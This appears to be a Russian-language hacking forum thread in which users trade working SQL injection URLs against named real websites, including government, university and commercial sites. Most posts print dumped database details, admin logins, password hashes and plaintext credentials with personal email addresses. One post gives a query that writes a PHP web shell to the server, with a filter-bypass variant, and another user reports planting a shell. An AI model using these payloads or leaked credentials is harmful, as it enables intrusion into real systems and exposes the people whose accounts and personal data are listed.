http://www.toofaced.com/product.asp?cat_id=-1+union+select+1,2,concat_ws(char(58),username,ema il,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23+from+vendor_logins+limit+0,1/*

123:brittney_jensen@hotmail.com1:vtest
PBONTA:ralinda@planetbeauty.com:pbontario
PBORAN:heather@planetbeauty.com:ORANGE
PBIRV:cole@planetbeauty.com:3881
PB1SAN:tarag@planetbeauty.com:123456
...
и т.д. лимитом

www.gamato.gr

Интересный сайтик ;)
БД 5'ой ветки.

Tables:
ID
NICK
PASSWORD
EMAIL
ICQ
http://www.gamato.gr/pictures.php?iid=-1)+union+select+1,2,3,4,concat_ws(0x3a,ID,NICK,PAS SWORD,EMAIL,ICQ),6,7,8,9,10,11,12,13,14,15,16,17,1 8,19+from+gamato_fileish.f_users+limit+0,1+--+
admin:eac3a72a92235afabb94b33c3e23e8f0

www.expo.chelsi.ru

http://expo.chelsi.ru/mainexpo.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),us er(),database()),6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20+--+
5.0.26-lk-log:chelsiru_expo@localhost:chelsiru_expo

Фонд стратегической культуры
http://www.fondsk.ru/article.php?id=-1+union+select+aes_decrypt(aes_encrypt(user(),0x71 ),0x71),123456789/*
u32888@10.10.223.204:5.0.45-log

http://www.safemaster.ru/verinfo.php?id=9999999+union+select+1,concat_ws(ch ar(58),user(),database(),version())/*
u21044@10.10.10.209:u21044:5.0.45-log

http://www.100cotton.ru/index.php?id=-1+union+select+1,2,3,4,5,6,version(),database(),se ssion_user(),10,11,12,13,14,15,16,17,18,19,20/*
siteis_user@localhost:4.1.22-standard

http://www.challenge-tv.com/index.php?mode=filedetail&file=-1+union+select+1,2,convert(table_name+using+latin1 ),4,5,6,7,8,9,10+from+information_schema.tables+wh ere+table_name+like+char(0x61,0x64,0x6d,0x69,0x6e, 0x25)+limit+0,1/*


З.Ы.

http://www.challenge-tv.com/index.php?mode=filedetail&file=-1+union+select+1,2,convert(concat_ws(0x3a,ID,usern ame,password,nick,email)+using+latin1),4,5,6,7,8,9 ,10+from+bouncer.users+limit+0,1/*

http://www.challenge-tv.com/index.php?mode=filedetail&file=-1+union+select+1,2,convert(concat_ws(0x3a,ID)+usin g+latin1),4,5,6,7,8,9,10+from+dennis.admin+limit+0 ,1/*
Не пускают :(

http://www.nalivaiko.ru/tovar.php?id=-1+union+select+concat(username,0x3a,password),2+fr om+admin/*
Oksana : oKSANA
http://baikal-iwf.com/main/bar.php?id=-1+union+select+1,concat(username,0x3a,password),3+ from+users/*
test : test

Суздаль
http://www.suzd.net/
http://www.suzd.net/news.php?id=-1+union+select+1,2,3,4,5,password+from+admins/*
Пароль админа : cdthrf56
http://www.suzd.net/news.php?id=-1+union+select+1,2,3,4,5,table_name+from+INFORMATI ON_SCHEMA.TABLES/*
табицы
http://www.suzd.net/news.php?id=-1+union+select+1,2,3,4,5,6+from+creditcards/*
creditcards - интересно...
http://www.suzd.net/news.php?id=-1+union+select+1,2,3,4,5,concat(id,1,11,1111,11111 11)+from+creditcards/*
p.s: раньше я задавал много тупых вопросов, репа была -31. потихоньку исправляюсь, пошёл в гору :D
и еще: этот пост большой и предыдущий тоже, поэтому я их и не объеденил. этот пост про www.suzd.net
:cool:

mara.by


http://www.mara.by/index.php?mode=detail&id=-1'+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1/*

4.0.18-standard-log/

http://www.mara.by/index.php?mode=detail&id=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,concat_ws(0x 2F,login,password),29,30,31,32,33,34,35,36,37,38,3 9,40,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1+from+user+limit+1010,1/*

логин/хеш 1013 юзеров

http://www.abandoned.ru/pic.php?id=-1+union+select+1,2,3,concat_ws(char(58),user(),ver sion(),database()),5,6/*
uryevich@localhost:4.0.18:abando



Казанский государственный университет (КГУ)

http://www.ksu.ru/tatnews.php?id=-20+union+select+1,2,3,4,concat_ws(char(58),user(), version(),database()),6,7,8,9,10,11/*
miu@localhost:4.0.18-log:kgu200



http://ecom-info.spb.ru/news/print.php?id=-773+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, concat_ws(char(58),user(),version(),database()),16 ,17,18,19,20,21,22,23,24,25,26/*
ecom@localhost:5.0.24a:ecom

http://www.pocomaxa-extreme.ru/content/article.php?id=-1+union+select+1,user(),3,4,5,6,7,8,9,10,11/*
pocomaxa@localhost

4job.ru
http://www.4job.ru/index.php?vac_id=-54183+union+select+concat(id,char(58),password)+fr om+users+limit+0,1/*
Версия - 4.1.22
Юзер - job4@localhost
Есть доступ к mysql.user

trailersbyniche.com
http://www.trailersbyniche.com/trailers_sites.php?categoryid=-21+union+select+1,2,aes_decrypt(aes_encrypt(concat (username,0x3a,password),0x71),0x71),4,5,6,7,8,9,1 0,11,12,13,14,15,16,17+from+users/*
Версия - 4.1.16
Юзер - VIKING@LEASE631
Опять же можно прочитать данные из mysql.user

systema.ru
http://www.systema.ru/inc/bkard.php?Id=-6+union+select+1,2,3,4,user,password+from+mysql.us er/*
Версия - 5.0.24a
Юзер - admin@www.systema.ru
5-ая ветка, соответственно можно прочитать из information_schema.tables, но из таблиц прочитать что-либо нельзя...
Зато существует доступ к mysql.user:
root - *A7CEC0AA91C37E406E05D39C4BC7C4B4B6064715
admin - *CE2618670420A28D6B759E9E0B8AE253F50DFD5B: nimda

znamenitosti.tv
http://znamenitosti.tv/base.php?content=index&language=ru&letter=-%D0%9E'+union+select+1,2,3,4,5,6,7,8,9,version(),1 1,12,13,14,user(),16/*
Версия - 5.0.27-log
Юзер - skygsi_znamenit@88.208.19.12
Опять 5-ая ветка, но вновь облом, совершенно никаких таблиц с интересной информацией...

Сенат
www.senate.michigan.gov
http://www.senate.michigan.gov/whitmer/transcript.php?id=1'+union+select+1,2,3,4,5,6,conc at_ws(0x3a,version(),user(),database()),8,9,10,11, 12/*
5.0.37-community-nt:demdba@localhost:caucusweb
Дальше всем известный сценарий.

http://www.clarionrus.ru/news.php?id=-51+union+select+1,2,3,concat_ws(char(58),user(),ve rsion(),database()),5,6/*
clarionrus@localhost:4.1.20-lk-log:clarionrus

http://www.comingsoon.net/films.php?id=-8437+union+select+1/*
comingso_nextra@csnet-node1-internal:4.1.22:comingso_nextra

http://www.linspire.com/lindows_news_pressreleases_archives.php?id=-213+union+select+concat_ws(char(58),user(),version ()),2/*
linspire@10.0.0.20:4.0.24-standard-log




Может кто разберется и раскрутит:
http://www.mtas.ru/second.php?ID=-13+union+select+1/*
http://www.planeta.tc/content.php?id=81+union+select+1,2,3,4,5,6,7,8,9,1 0,11/*

http://[host]/searchresult.php?sbcat_id=999999[sql-inj]http://www.mytarif.com/searchresult.php?sbcat_id=11111111+union+select+1, concat(version(),0x3a,user(),0x3a,database()),3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3/*4.1.22-standard:anime_yemek@localhost:anime_yemekhttp://www.garnek.net/searchresult.php?sbcat_id=11111111+union+select+1, concat(version(),0x3a,user(),0x3a,database()),3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3/*4.1.22-log:byq_9@ama127.rev.netart.pl:byq_9http://www.kochfeuer.de/searchresult.php?sbcat_id=9999999+union+select+1,c oncat(version(),0x3a,user(),0x3a,database()),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*5.0.32-Debian_7etch1~bpo.1-log:dbu1017245@localhost:db1017245-kochfeuer1http://www.coolave.com/resources/searchresult.php?sbcat_id=99999+union+select+1,con cat(version(),0x3a,user(),0x3a,database()),3,4/*5.0.37-standard-log:avemusic_h742510@localhost:avemusic_coolavehtt p://www.arabhorse.com/links/searchresult.php?sbcat_id=1111+union+select+1,conc at(version(),0x3a,user(),0x3a,database()),3,4/*4.1.22-standard:arabhors_ah@localhost:arabhors_arabhorsed bhttp://www.desikitchen.com/new/searchresult.php?sbcat_id=11111111+union+select+1, concat(version(),0x3a,user(),0x3a,database()),3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3/*4.1.22-standard:desikit_desikit2@localhost:desikit_portal 2http://www.bobsbeerandbbq.com/searchresult.php?sbcat_id=11111111+union+select+1, concat(version(),0x3a,user(),0x3a,database()),3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3/*5.0.27-standard-log:claudia_recipe@localhost:claudia_recipehttp://www.dubina.com/searchresult.php?pg=5&sbcat_id=9999+union+select+1,concat(version(),0x3a ,user(),0x3a,database()),3,4,5/*4.1.22-standard-log:dubinaco_dubdir@localhost:dubinaco_dir1 http://www.grizzlynut.co.nz/directory/searchresult.php?&sbcat_id=99999999+union+select+1,concat(version(), 0x3a,user(),0x3a,database()),3,4/*4.1.22-standard-log:grizzlyn_direct@localhost:grizzlyn_direct

http://www.realityhomes.com.do/cat.php?id=999+union+select+1,2,3,concat_ws(0x2F,u ser,pass,mail),5,6,7,8,9,10,11+from+usuarios/*

Version: 5.0.27-standard/nachon_sistema@localhost/nachon_sistema

Админы и юзвери

User Pass Mail

nachon/viejito/maneylandia@hotmail.com
guitarman/123456/luigisalas@hotmail.com
yospower/power/yospower1@yahoo.com
tribi32/triby0/yorbis11@hotmail.com
F./5v5ml5g5v5/vitico54@hotmail.com
teodoro/toly2468/ics_teodoro@hotmail.com
joriel/0230/joriel@netzeo.net
nmcprl/Carlanatalia/ncastillo@tricom.com.do
herrerap/222008/herrerap@realityhomes.com.do
Carlos/crpf13/crpfga@yahoo.es
mamto/8808607/mamto@realityhomes.com.do
Jissel/filipe/Jissel4@aol.com
otto/77688166601/ottocespedes@hotmail.com
dj-luis/987654321/lincon817@aol.com
elisa/espimai/liz_007_vip@hotmail.com

Группа Центр

Дата рождения: 2004 год
Место рождения: г. Москва

Краткое досье: это одно из самых сильных звеньев СПРУТ групп, который является Единственным Союзом по-настоящему разносторонних уличных талантов. «Центр» является основой этого объединения, принимая непосредственное участие в концертной и творческой деятельности проекта.
Группа «Центр» объединяет самых перспективных и интересных рэп-исполнителей на данный момент: Гуфа aka Rolex-X, Slim’а aka Slimus, Птаху и Принципа. И если первый – гений текстов и крылатых фраз, второй профессионал от музыки, то последние два – отлично читают, преподнося наработанный материал наилучшим образом.

http://www.centrgroup.ru/nn.php?id=-1+union+select+1,2,3,4,5,concat(id,0x20,user_name, 0x3a,user_pass),7+from+users+where+id=1/*

и ещё чета
http://www.gala-europe.de/ps.php?ID=-1'+union+select+table_name,2+from+information_sche ma.tables/*

rmx.ru

http://www.rmx.ru/photo/?id=-1+or+1=@@version--

Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on
Windows NT 5.2 (Build 3790: Service Pack 1)

http://www.rmx.ru/photo/?id=-1+or+1=(select+db_name())-- remix

http://www.rmx.ru/photo/?id=-1+or+1=(select+system_user)-- REMIXUS\IUSR_REMIXUS

------------------------------------------------------------------------

e-rostov.ru

http://www.e-rostov.ru/nws_podrob.php?nws=-1+union+select+1,2,3,4,5,concat_ws(0x2F,version(), database(),user()),7,8,9/*

5.0.27/db0662111/db0662111@localhost



http://www.e-rostov.ru/nws_podrob.php?nws=-1+union+select+1,2,3,4,5,concat_ws(0x2F,cast(al_lo gin+as+binary),cast(al_password+as+binary)),7,8,9+ from+admin_list+limit+0,1/*

логин/хеш
artexoid/81dc9bdb52d04dc20036dbd8313ed055


Другие интересные таблицы:

board_admin (LOGIN/ PASSWD), estate_admin(LOGIN/ PASSWD), estate_loginag(LOGIN / PASSWORD), news_admin(LOGIN/ PASSWD), question_admin(LOGIN/ PASSWD), stat_admin(LOGIN/ PASSWD), stic_admin(LOGIN/ PASSWD)

http://utdallas.edu/calendar/event.php?id=-1+UNION+SELECT+1,database(),version(),user(),5,6,7 ,8,9,10,11,12,13/*

user() == webdev_anon@www1.utdallas.edu
database() == calendar
version() == 4.0.18-max-log

И вновь - Румыния!

burseguvern.rohttp://www.burseguvern.ro/articole/articol.php?id=2&id_modul=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5/*4.1.22-standard-log:burseguv_burse:burseguv_adm@localhost

ugir1903.rohttp://www.ugir1903.ro/ugir1903/articol.php?codp=-1+union+select+concat_ws(0x3a,version(),database() ,user())/*4.1.22-standard-log:ugir1903_main:ugir1903_web@localhost

dreptonline.rohttp://www.dreptonline.ro/articole/articol.php?id_articol=-1+union+select+concat_ws(0x3a,version(),database() ,user()),2,3,4,5,6,7,8,9/*4.1.22-standard:dreptonl_dr:dreptonl_dr@localhost

В табе useri 12 692 юзера :http://www.dreptonline.ro/articole/articol.php?id_articol=-1+union+select+concat_ws(0x3a,user,parola,email),2 ,3,4,5,6,7,8,9+from+useri+limit+12691,1/*

Немного данных [user : pass : email] :Dan:gringotts:popeangad@yahoo.com
Hfirimain:gringotts:popeanga@dreptonline.ro - типа Админ
auras1:ferari11:auras@rol.ro
florian.r:dreptcivil:florian.r@xyz.ro

Румыния

SmartCall.rohttp://www.smartcall.ro/document.php?doc=-1+union+select+1,2,concat(aes_decrypt(aes_encrypt( version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt (database(),0x71),0x71),0x3a,aes_decrypt(aes_encry pt(user(),0x71),0x71)),4,5,6,7,8,9/*5.0.18:smartcall:smartcall@localhost

Наша таба auth_users:id,username,email,password_md5,коне цформыначалоформыis_superuser,fir st_name,last_nameДанные:http://www.smartcall.ro/document.php?doc=-1+union+select+1,2,concat_ws(0x3a,aes_decrypt(aes_ encrypt(username,0x71),0x71),aes_decrypt(aes_encry pt(password_md5,0x71),0x71)),4,5,6,7,8,9+from+test .auth_users+limit+0,1/*Админ:dima:ebb934cccce0cbe48e5b017398807a46A MIcom.rohttp://www.amicom.ro/studii/studiu.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5/*5.0.27:amicom:amicomadmin@localhost

Таба users:username,userpassАдминка стандартно - _http://www.amicom.ro/admin/

Админ:admin : admin123

Румыния

ReporterDeOcazie.rohttp://www.reporterdeocazie.ro/index.php?page=intrebarea_zilei&id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5/*5.0.21:reporterdeocazie:reporter@localhost

Наши таблицы - Admin,Useri и phpbb_users

Таблица Admin - пустая, с остальными проблем нет:http://www.reporterdeocazie.ro/index.php?page=intrebarea_zilei&id=-1+union+select+1,concat_ws(0x3a,User,Password,Emai l),3,4,5+from+Useri+limit+0,1/*

Муниципальные образования Приморского края
http://www.mo.primorsky.ru/kirovsky/view.php?id=-1+union+select+1/*
www.mxd.ru
http://www.mxd.ru/projects/design/view.php?id=-1+union+select+1,database(),3,4,user(),6,7,pass,9, 10,11,12,13,14,version(),16,17,18,19,20,21,22,23+f rom+user/*
Пароль админа: root
правда логин не знаю , и куда все эт сувать :(
mxd@62.205.161.7
4.0.27-log
http://women.unesco.kz
http://women.unesco.kz/view.php?id=-1+union+select+concat(login,0x3a,pwd),2,3,4,5,6+fr om+users+limit+1/*
XaHyMaH : aurora
не нашел где залогиниться =(
http://www.patkirk.com
http://www.patkirk.com/make.php?id=-1+union+select+user(),database(),version(),4,5,6,7 +INFORMATION_SCHEMA/*
web18-patkirk1@localhost
web18-patkirk1
5.0.45-community
дальше ни че не смог сделать. есил что то получится у вас, отпишитесь плз.
http://www.age.fr/fr/module.php?ID=-1+order+by+11/*
После долгих мучений, я в плюсе!!! :D
:cool:

http://portsmon.freebsd.org/

http://portsmon.freebsd.org/portoverview.py?category=&portname=gkrellsun'+UniOn+selEct+concat(version(), ':',user()),2,3,4/*&wildcard=yes
5.0.45_:_portsmon_u@localhost

http://portsmon.freebsd.org/portoverview.py?category=&portname=gkrellsun'+UniOn+selEct+concat(table_name ,':',column_name),2,3,4+from+information_schema.co lumns/*&wildcard=yes

таблиц много, но как и следовало ожидать /для меня/ не чего интересного

Италия

http://www.megalab.it/articoli.php?id=220&pagina=-2+union+select+concat_ws(char(58),user(),version() ,database())/*
megalabdb@localhost:5.0.37-log:megalab

http://www.aduc.it/dyn/comunicati/comu_mostra.php?id=999999999999999+union+select+1, 2,concat_ws(char(58),user(),version(),database()), 4/*
aduc@localhost:5.0.26:aducdb

http://www.sodalitas.it/news.php?ID=-222+union+select+1,2,concat_ws(char(58),user(),ver sion(),database()),4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35,36,37,38,39,40,41,42,43,44,45,46/*
sod78as68@localhost:4.1.20:Sql945as

http://www.corvorosso.it/pagine/articoli.php?id=-1021+union+select+1,2,3,concat_ws(char(58),user(), version(),database()),5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
corvo29@web2-rodonet.rodonet.it:5.0.24a-Debian_9ubuntu2-log:corvo

http://www.ghislieri.it/pagina.php?id=-104+union+select+1,2,3,4,5,6,7,8/*
rettorato@localhost:5.0.27-log:rettorato

http://www.onboard.ru
http://www.onboard.ru/resort/?id=-1+union+select+user()/*

Италия

http://www.millenniumcampaign.it/standup/newsDett.php?id=-36+union+select+1,2,3,concat_ws(char(58),user(),ve rsion(),database()),5/*
ML2693_usoft@81.88.49.2:4.1.22-standard-log:millenniumcampaign_it_standup2007



edu

http://blogsforlearning.msu.edu/articles/view.php?id=-6+union+select+1,2,3,4,5,6,7,8,9/*

ОАО «Белвнешэкономбанк»
http://www.bveb.by/news/index.php?ItemNumber=-1+union+select+1,2,3,4,5,6,7,8,9,1,2/*
Кому интересно, копайте дальше... (:

вот по сути запрос заливки шелла в вашем случае...
http://theplace.ru/news/news.php?id=-18864+union+select+1,2,3,4,5,6,7,'<?php system($_GET[cmd]); ?>',9,10,11,12+from+into+outfile+'/здесь путь.../cmd.php'/*

так будет выглядить запрос для обхода фильтрации
http://theplace.ru/news/news.php?id=-18864+union+select+1,2,3,4,5,6,7,CHAR(39, 60, 63, 112, 104, 112, 32, 115, 121, 115, 116, 101, 109, 40, 36, 95, 71, 69, 84, 91, 99, 109, 100, 93, 41, 59, 32, 63, 62, 39),9,10,11,12+from+into+outfile+CHAR(39, 47, 1079, 1076, 1077, 1089, 1100, 32, 1087, 1091, 1090, 1100, 46, 46, 46, 47, 99, 109, 100, 46, 112, 104, 112, 39)/*

P.S существует удобный плагин для таких дел HackBar (Firefox)...

нифига не получается! пробую просто на локальном компе, вообще для другой базы. На простейшем примере.
Вот так пишет в файл:

SELECT description
FROM films
WHERE fid =5 into outfile '123654.txt'

а вот так выдает ошипку:

SELECT description
FROM films
WHERE fid =5 into outfile char(49,50,51,54,53,52,46,116,120,116)

и так тоже не пашет: (типа имя файла в кавычки взял:

SELECT description
FROM films
WHERE fid =5 into outfile char(39,49,50,51,54,53,52,46,116,120,116,39)


Выходит, что нельзя писать в файл если кавычечги фильтруются?

код:

http://inbox.net.ua/index.php?id=900&show=news&newsid=-3462+union+select+1,table_name,3+from+information_ schema.tables+limit+992,1/*

большая бд,стоит фильтрация на скобки
__________________________________________
достаточно большой сайт :)

код:
http://www.femina.com.ua/cgi-bin/board.cgi?page=694&zrazdel=-3+union+select+1,concat(username,0x3a,user_passwor d)+from+phpbb_users+limit+1,1/*&pages=1046

5 версия мускула,много таблиц

админ на форуме admin:atvbyf

__________________________________________

тоже не маленький сайт ;)

код:

http://wantbaby.info/guide/glossary/?Term=-5+union+select+1,concat(table_schema,0x3a,table_na me,0x3a,column_name),3,4,5,6,7,8,9+from+informatio n_schema.columns/*

вывод-"все сразу"

www.strawtec.com.au
http://www.strawtec.com.au/content.php?id=<sql-inj>
4.1.12a-nt-max:strawtec@localhost:strawbale
strawtecadmin:snowfall88
strawtec:Phil Egan
brett:trustno1

Официальный сайт хоккейного клуба «Рязань»
http://hcryazan.ru/about_user.php?id=-1+union+select+1,concat_ws(0x3a,name,pass,mail,icq ),3,mail,icq,pass,6,7,8,9+from+users/*
Эт база всех юзеров - ник пароль мыло ася
Admin : secret : admin@hc-rzn.org.ru : 399828412
помогите найти, куда пароль вводить для админа.
З.Ы: если кто за них болеет, не обижайтесь :D
http://www.shadowknights.ru/index.php?id=-1+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13/*

помогите найти, куда пароль вводить для админа. хочу изменить главную стр.
З.Ы: если кто за них болеет, не обижайтесь :D
Дефэйсы запрещаются АНТИЧАТОМ!

zamut
понятно, никаких дефейсов!
за что ж вы так с моей репой? :(

http://www2a.cdc.gov/phlp/dailynews/default.asp?specific=1%20and%201=convert(int,@@ver sion)--

'Microsoft SQL Server 2000 - 8.00.818 (Intel X86) May 31 2003 16:08:15 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) '

http://www2a.cdc.gov/phlp/dailynews/default.asp?specific=1%20and%201=convert(int,@@ser vername)--

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'QPHP-ATL-PROD1' to a column of data type int.

www.pose.is

БД 4'ой ветки
http://www.pose.is/fullfrettir.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_w s(0x3a,username,password),14,15,16,17,18,19+from+u sers+--+
admin:123fazmo

Еда

http://www.cviog.uga.edu/spotlight/news/item.php?id=-241+union+select+user(),database(),3,4,5,6,7,8,ver sion()/*
user() webmstr@localhost
database() news
version() 4.0.18


http://www.ic.usu.edu/forum/topic.php?forum_id=-1+union+select+concat_ws(char(95, 95, 95),user(),version(),database())/*

user() root2@localhost
database() ic_forum
version() 4.1.20

http://www.sportsmindskills.com


http://www.sportsmindskills.com/sport.php?id=5+union+select+Email_address,User_pas sword+from+user/*

http://www.green.ru

http://www.green.ru/news/event.htm?id=63+union+select+1,2,3,login,password, 6,7+from+users/*

Привет, Италия!

everyeye.ithttp://www.everyeye.it/anime/articolo.asp?id=-1+union+select+1,2,3,concat(aes_decrypt(aes_encryp t(version(),0x71),0x71),0x3a,aes_decrypt(aes_encry pt(database(),0x71),0x71),0x3a,aes_decrypt(aes_enc rypt(user(),0x71),0x71))/*4.1.18-NT:EVERYEYE_IT:ADMIN@LOCALHOSТ

momentosera.comhttp://www.momentosera.com/articolo.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat(aes_ decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes _decrypt(aes_encrypt(database(),0x71),0x71),0x3a,a es_decrypt(aes_encrypt(user(),0x71),0x71))/*4.1.14-nt:momentosera1:ms@217.72.103.15

ilmascalzone.ithttp://www.ilmascalzone.it/articolo.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6,7,8/*4.0.27-standard-log:Sql17365_3:Sql17365@62.149.140.32

sapereperfare.ithttp://www.sapereperfare.it/articoloExt.php?id=-1%20union%20select%201,2,concat_ws(0x3a,version(), database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25/*&link=174.0.24_Debian-10sarge2:sapereperfa11865:sapereperfa11865@wnx-20.seeweb.it

uomo-libero.comhttp://www.uomo-libero.com/autore.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6/*&onlyfull=04.0.24-standard-log:uomolibero:uomolibero@localhost

Админка:http://www.uomo-libero.com/admin/
Админы:http://www.uomo-libero.com/autore.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,login,passwo rd),6+from+users+limit+0,1/*&onlyfull=0[Логин : Пасс] :uomolibero:u0m0l1b
mahutg:okamilykosЗалил шелл:http://www.uomo-libero.com/images/file/rs.phpОказалось на серваке крутятся сайты:thenoiseisthemassage.org
unsedicesimo.corraini.com
www.creativenetwork.it
www.affiliate-blog.org
www.affiliatemagazine.net
www.affiliazione.info
www.ajax-blog.com
www.contactwizard.it
www.corraini.com
www.creativepress.it
www.festivaletteratura.it
www.ggindustriegrafiche.com
www.intranet-blog.com
www.mantuaconnection.com
www.narninews.it
www.onajax.com
www.passionesaxo.com
www.piazzalberti.org
www.pochimaledettiesubito.BCK
www.pochimaledettiesubito.com
www.quicomincialalettura.org
www.risorse-gratis.it
www.sacconicase.it
www.ternieprovincia.com
www.testounicoprivacy.it
www.uomo-libero.com
www.webhosting-gratis.it
www.writeonit.orgЛюди - будьте добрыми хацкерами!!!

Powered By Tilde CMS довольно дырявая CMS, можно найти кучу скулей, как в старых так и новых версиях.

Пример:www.meditalklinik.dk

_http://www.meditalklinik.dk/index.php?id=-1+union+select+1,concat(version(),0x3a,user(),0x3a ,database()),3,4,5,6,7,8,9/*5.0.45:meditalkli@linux2.wannafind.dk:meditalklin ik_dk_db
version=>5 ->
http://www.meditalklinik.dk/index.php?id=-1+union+select+1,table_name,3,4,5,6,7,8,9+from+inf ormation_schema.tables/*
Смотрим таблицы, меняя лимит:

_http://www.meditalklinik.dk/index.php?id=-1+union+select+1,table_name,3,4,5,6,7,8,9+from+inf ormation_schema.tables+limit+1,1/*
Всего 23 таблицы:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
ArtikelLink
ArtikelMain
ArtikelParaLinksRelation
ArtikelParaRelation
ArtikelParagraf
Menu_statisk

http://masteroff.org
http://masteroff.org/edit.php?q=44691+UNION+SELECT+1,pass,3,4,5,6,7,8,9 ,10,11+from+users/*
login: admin
hash: 5416d7cd6ef195a0f7622a9c56b55e84
pass: 1q2w3e4r

edu

http://www.dukemednews.duke.edu/av/video.php?id=-1+union+select+1111111,password+from+mysql.user/*


web@vml-news.duhs.duke.edu:4.0.18:news

web:623460e26f081bbc



http://geology.osu.edu/faculty_bios.php?id=-27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/* //Есть доступ к mysql.user
web_bot@emerald.geology.ohio-state.edu:5.0.22:geosci_web
# 1cd219690c8c93cd
# root

Slip выкладывал вроде почти ее =/

http://www.galamax.it/Abito.it.php?Id=-1+union+select+1,user(),3,4,database(),6,7,8,versi on(),10/*
http://microplasma.ru/?page_id=-1+union+select+1,2,3,4,5/*
http://ocenshik.mostpp.ru/static.php?id=-1+order+by+8/*
http://www.sobesednik.ru/news.php?id=1&art_id=-1'
http://www.rudtp.ru/lib.php?id=-1+order+by+12/*
http://www.iek.ru/product/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20/*&category=88&product=36
:cool: :cool: :cool:

www.multilingual.com
http://www.multilingual.com/mlNewsArchiveDetail.php?id=-1+union+select+1,2,3,version()+--+
5.0.27-standard
http://www.multilingual.com/mlNewsArchiveDetail.php?id=-1+union+select+1,2,3,concat(table_schema,0x3a,tabl e_name)+from+information_schema.columns+where+colu mn_name=0x70617373776F7264+--+
blogos:exp_members

username
password
email
http://www.multilingual.com/mlNewsArchiveDetail.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,passw ord,email)+from+blogos.exp_members+limit+0,1+--+
eeadmin:f59e5685b68217f1867988be7c15db56e8bb94ba:d onna@multilingual.com
donna:cde612de4aed40a0b25ccf16d32d55c23e2be737:boo ks@multilingual.com

http://www.hvcc.edu/news_events/newsstory.php?id=-1+union+select+1,concat(username,0x3a,password),3, 4,5,6,7,8,9,10,11,12,13,14+from+mysql.user/*

root:*928AC7647884E687088EEAB171F96719E4C78BBD
admin:522737936936e128 - nimda
landp:*B0FA4CE370C35CCBDE20BD7D7E1CCD1135FBCFE1

Италия

sulpalco.comhttp://www.sulpalco.com/articoli/articolo.php?id=-1+union+select+1,2,3,4,concat(aes_decrypt(aes_encr ypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_enc rypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_e ncrypt(user(),0x71),0x71)),6,7,8,9,10,11/* 4.1.18-nt:sp_vers1:sulpalco@localhost

bandieragialla.it
[CODE]http://www.bandieragialla.it/articolo.php?id=-1+union+select+1,concat(aes_decrypt(aes_encrypt(ve rsion(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(d atabase(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt (user(),0x71),0x71)),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17/* 4.1.12-standard:www2:www2db@localhost

storialibera.it
[CODE]http://www.storialibera.it/il_sabato/articolo.php?id=-1+union+select+1,2,3,concat(aes_decrypt(aes_encryp t(version(),0x71),0x71),0x3a,aes_decrypt(aes_encry pt(database(),0x71),0x71),0x3a,aes_decrypt(aes_enc rypt(user(),0x71),0x71)),5,6,7,8,9,10,11,12,13/* 4.1.13-standard:storialibera:sl_user@localhost

Нашёл только табу articoli

thelancet.ithttp://www.thelancet.it/archivio/articolo.php?id=13&idart=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versio n(),database(),user())/* 4.0.24-log:Sql321et:the76et13@demone.consultingweb.it

